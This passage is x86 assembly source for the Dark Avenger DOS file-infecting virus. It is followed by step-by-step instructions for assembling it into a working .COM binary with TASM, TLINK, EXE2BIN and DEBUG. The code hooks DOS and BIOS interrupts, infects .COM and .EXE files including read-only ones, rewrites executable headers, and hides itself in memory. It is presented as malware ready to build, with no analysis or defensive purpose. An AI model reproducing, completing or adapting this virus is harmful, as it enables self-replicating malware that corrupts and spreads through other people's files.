pop ds popfdummy proc far ;??? ret 2dummy endp ; Checks whether the file is .COM or .EXE.; It is not called upon file execution. see_name: push ax push si mov si,dxscan_name: lodsb test al,al jz bad_name cmp al,'.' jnz scan_name call get_byte mov ah,al call get_byte cmp ax,'co' jz pos_com cmp ax,'ex' jnz good_name call get_byte cmp al,'e' jmp short good_namepos_com: call get_byte cmp al,'m' jmp short good_namebad_name: inc algood_name: pop si pop ax ret ; Converts into lowercase (the subroutines are a great thing). get_byte: lodsb cmp al,'C' jc byte_got cmp al,'Y' jnc byte_got add al,20hbyte_got: ret ; Calls the original INT 21h. function: pushf call dword ptr cs:[save_int_21] ret ; Arrange to infect an executable file. do_file: push ds ;Save the registers in stack push es push si push di push ax push bx push cx push dx mov si,ds xor ax,ax mov ds,ax les ax,ds:[24h*4] ;Saves INT 13h and INT 24h in stack push es ;and changes them with what is needed push ax mov ds:[24h*4],offset int_24 mov ds:[24h*4+2],cs les ax,ds:[13h*4] mov word ptr cs:[save_int_13],ax mov word ptr cs:[save_int_13+2],es mov ds:[13h*4],offset int_13 mov ds:[13h*4+2],cs push es push ax mov ds,si xor cx,cx ;Arranges to infect Read-only files mov ax,4300h call function mov bx,cx and cl,0feh cmp cl,bl je dont_change mov ax,4301h call function stcdont_change: pushf push ds push dx push bx mov ax,3d02h ;Now we can safely open the file call function jc cant_open mov bx,ax call disease mov ah,3eh ;Close it call functioncant_open: pop cx pop dx pop ds popf jnc no_update mov ax,4301h ;Restores file's attributes call function ;if they were changed (just in case)no_update: xor ax,ax ;Restores INT 13h and INT 24h mov ds,ax pop ds:[13h*4] pop ds:[13h*4+2] pop ds:[24h*4] pop ds:[24h*4+2] pop dx ;Register restoration pop cx pop bx pop ax pop di pop si pop es pop ds ret ; This routine is the working horse. 
disease: push cs pop ds push cs pop es mov dx,offset top_save ;Read the file beginning mov cx,18h mov ah,3fh int 21h xor cx,cx xor dx,dx mov ax,4202h ;Save file length int 21h mov word ptr [top_save+1ah],dx cmp ax,offset my_size ;This should be top_file sbb dx,0 jc stop_fuck_2 ;Small files are not infected mov word ptr [top_save+18h],ax cmp word ptr [top_save],5a4dh jne com_file mov ax,word ptr [top_save+8] add ax,word ptr [top_save+16h] call mul_16 add ax,word ptr [top_save+14h] adc dx,0 mov cx,dx mov dx,ax jmp short see_sickcom_file: cmp byte ptr [top_save],0e9h jne see_fuck mov dx,word ptr [top_save+1] add dx,103h jc see_fuck dec dh xor cx,cx ; Check if the file is properly infected see_sick: sub dx,startup-copyright sbb cx,0 mov ax,4200h int 21h add ax,offset top_file adc dx,0 cmp ax,word ptr [top_save+18h] jne see_fuck cmp dx,word ptr [top_save+1ah] jne see_fuck mov dx,offset top_save+1ch mov si,dx mov cx,offset my_size mov ah,3fh int 21h jc see_fuck cmp cx,ax jne see_fuck xor di,dinext_byte: lodsb scasb jne see_fuck loop next_bytestop_fuck_2: retsee_fuck: xor cx,cx ;Seek to the end of file xor dx,dx mov ax,4202h int 21h cmp word ptr [top_save],5a4dh je fuck_exe add ax,offset aux_size+200h ;Watch out for too big .COM files adc dx,0 je fuck_it ret ; Pad .EXE files to paragraph boundary. This is absolutely unnecessary. fuck_exe: mov dx,word ptr [top_save+18h] neg dl and dx,0fh xor cx,cx mov ax,4201h int 21h mov word ptr [top_save+18h],ax mov word ptr [top_save+1ah],dxfuck_it: mov ax,5700h ;Get file's date int 21h pushf push cx push dx cmp word ptr [top_save],5a4dh je exe_file ;Very clever, isn't it? 
mov ax,100h jmp short set_adrexe_file: mov ax,word ptr [top_save+14h] mov dx,word ptr [top_save+16h]set_adr: mov di,offset call_adr stosw mov ax,dx stosw mov ax,word ptr [top_save+10h] stosw mov ax,word ptr [top_save+0eh] stosw mov si,offset top_save ;This offers the possibilities to movsb ;some nasty programs to restore movsw ;exactly the original length xor dx,dx ;of the .EXE files mov cx,offset top_file mov ah,40h int 21h ;Write the virus jc go_no_fuck ;(don't trace here) xor cx,ax jnz go_no_fuck mov dx,cx mov ax,4200h int 21h cmp word ptr [top_save],5a4dh je do_exe mov byte ptr [top_save],0e9h mov ax,word ptr [top_save+18h] add ax,startup-copyright-3 mov word ptr [top_save+1],ax mov cx,3 jmp short write_headergo_no_fuck: jmp short no_fuck ; Construct the .EXE file's header do_exe: call mul_hdr not ax not dx inc ax jne calc_offs inc dxcalc_offs: add ax,word ptr [top_save+18h] adc dx,word ptr [top_save+1ah] mov cx,10h div cx mov word ptr [top_save+14h],startup-copyright mov word ptr [top_save+16h],ax add ax,(offset top_file-offset copyright-1)/16+1 mov word ptr [top_save+0eh],ax mov word ptr [top_save+10h],100h add word ptr [top_save+18h],offset top_file adc word ptr [top_save+1ah],0 mov ax,word ptr [top_save+18h] and ax,1ffh mov word ptr [top_save+2],ax pushf mov ax,word ptr [top_save+19h] shr byte ptr [top_save+1bh],1 rcr ax,1 popf jz update_len inc axupdate_len: mov word ptr [top_save+4],ax mov cx,18hwrite_header: mov dx,offset top_save mov ah,40h int 21h ;Write the file beginningno_fuck: pop dx pop cx popf jc stop_fuck mov ax,5701h ;Restore the original file date int 21hstop_fuck: ret ; The following is used by the INT 21h and INT 27h handlers in connection; to the program hiding in memory from those who don't need to see it.; The whole system is absurde and meaningless and it is also another source; for program conflicts. 
alloc: push ds call get_chain mov byte ptr ds:[0],'M' pop ds ; Assures that the program is the first one in the processes,; which have intercepted INT 21h (yet another source of conflicts). ontop: push ds push ax push bx push dx xor bx,bx mov ds,bx lds dx,ds:[21h*4] cmp dx,offset int_21 jne search_segment mov ax,ds mov bx,cs cmp ax,bx je test_complete ; Searches the segment of the sucker who has intercepted INT 21h, in; order to find where it has stored the old values and to replace them.; Nothing is done for INT 27h. xor bx,bxsearch_segment: mov ax,[bx] cmp ax,offset int_21 jne search_next mov ax,cs cmp ax,[bx+2] je got_himsearch_next: inc bx jne search_segment je return_controlgot_him: mov ax,word ptr cs:[save_int_21] mov [bx],ax mov ax,word ptr cs:[save_int_21+2] mov [bx+2],ax mov word ptr cs:[save_int_21],dx mov word ptr cs:[save_int_21+2],ds xor bx,bx ; Even if he has not saved them in the same segment, this won't help him. return_control: mov ds,bx mov ds:[21h*4],offset int_21 mov ds:[21h*4+2],cstest_complete: pop dx pop bx pop ax pop ds ret ; Fetch the segment of the last MCB get_chain: push ax push bx mov ah,62h call function mov ax,cs dec ax dec bxnext_blk: mov ds,bx stc adc bx,ds:[3] cmp bx,ax jc next_blk pop bx pop ax ret ; Multiply by 16 mul_hdr: mov ax,word ptr [top_save+8]mul_16: mov dx,10h mul dx ret db 'This program was written in the city of Sofia ' db '(C) 1988-89 Dark Avenger',0 ; INT 13h handler.; Calls the original vectors in BIOS, if it's a writing call int_13: cmp ah,3 jnz subfn_ok cmp dl,80h jnc hdisk db 0eah ;JMP XXXX:YYYYmy_size: ;--- Up to here comparisondisk: ; with the original is made dd 0hdisk: db 0eah ;JMP XXXX:YYYYfdisk: dd 0subfn_ok: db 0eah ;JMP XXXX:YYYYsave_int_13: dd 0call_adr: dd 100h stack_pointer: dd 0 ;The original value of SS:SPmy_save: int 20h ;The original contents of the first nop ;3 bytes of the filetop_file: ;--- Up to here the code is writtenfilehndl equ $ ; in the filesfilename equ filehndl+2 ;Buffer for the name of 
the opened filesave_int_27 equ filename+65 ;Original INT 27h vectorsave_int_21 equ save_int_27+4 ;Original INT 21h vectoraux_size equ save_int_21+4 ;--- Up to here is moved into memorytop_save equ save_int_21+4 ;Beginning of the buffer, which ;contains ; - The first 24 bytes read from file ; - File length (4 bytes) ; - The last bytes of the file ; (my_size bytes)top_bz equ top_save-copyrightmy_bz equ my_size-copyrightcode ends end------------------------------------------------------------------------------ A few notes on assembling this virus. It's a little bit tricky assembling the Dark Avenger Virus. Use these steps below. I use Turbo Assembler 2.0, but I'm positve that MASM will work just as well. 1: TASM AVENGER.ASM 2: TLINK AVENGER.OBJ 3: EXE2BIN AVENGER AVENGER.COM Now make a 3 byte file named JUMP.TMP using DEBUG like this 4: DEBUG n jmp.tmp e 0100 E9 68 00 rcx 3 w q 5: Now do this COPY JMP.TMP + AVENGER.COM DAVENGER.COM There you have it....